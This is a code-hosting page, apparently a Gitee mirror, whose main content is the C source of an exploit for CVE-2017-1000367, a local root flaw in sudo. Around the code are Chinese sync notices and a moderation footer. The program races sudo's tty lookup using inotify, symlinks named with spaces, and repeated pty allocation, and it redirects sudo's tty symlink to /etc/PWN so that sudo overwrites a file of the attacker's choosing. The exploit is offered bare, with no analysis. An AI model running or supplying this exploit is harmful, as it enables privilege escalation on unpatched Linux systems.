代码拉取完成,页面将自动刷新
同步操作将从 bjking/CVE-2017-1000367 强制同步,此操作会覆盖自 Fork 仓库以来所做的任何修改,且无法恢复!!!
确定后同步将在后台操作,完成时将刷新页面,请耐心等待。
#include <errno.h>
#include <linux/sched.h>
#include <pty.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/inotify.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#define EVENT_SIZE ( sizeof (struct inotify_event) )
#define EVENT_BUF_LEN ( 1024 * ( EVENT_SIZE + 16 ) )
int main( )
{
int length, i = 0;
int fd;
int wd;
char buffer[EVENT_BUF_LEN];
int master, slave;
char pts_path[256];
struct sched_param params;
params.sched_priority = 0;
mkdir("/dev/shm/_tmp", 755);
symlink(pts_path, "/dev/shm/_tmp/_tty");
symlink("/usr/bin/sudo", "/dev/shm/_tmp/ 34873 ");
fd = inotify_init();
wd = inotify_add_watch( fd, "/dev/shm/_tmp", IN_OPEN | IN_CLOSE_NOWRITE );
pid_t pid = fork();
setpriority(PRIO_PROCESS, pid, 19);
sched_setscheduler(pid, SCHED_IDLE, ¶ms);
if(pid == 0) {
execlp("/dev/shm/_tmp/ 34873 ", "sudo", "hello", NULL);
}else{
length = read( fd, buffer, EVENT_BUF_LEN );
while ( i < length ) {
struct inotify_event *event = ( struct inotify_event * ) &buffer[ i ];
if ( event->len ) {
if ( event->mask & IN_OPEN ) {
kill(pid, SIGSTOP);
inotify_rm_watch( fd, wd );
close( fd );
while(strcmp(pts_path,"/dev/pts/57")){
openpty(&master, &slave, &pts_path[0], NULL, NULL);
};
kill(pid, SIGCONT);
}else if ( event->mask & IN_CLOSE_NOWRITE ) {
kill(pid, SIGSTOP);
inotify_rm_watch( fd, wd );
close( fd );
unlink("/dev/shm/_tmp/_tty");
symlink("/etc/PWN", "/dev/shm/_tmp/_tty");
kill(pid, SIGCONT);
break;
}
}
i += EVENT_SIZE + event->len;
}
}
unlink("/dev/shm/_tmp/_tty");
unlink("/dev/shm/_tmp/ 34873 ");
rmdir("/dev/shm/_tmp");
close(master);
close(slave);
}
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。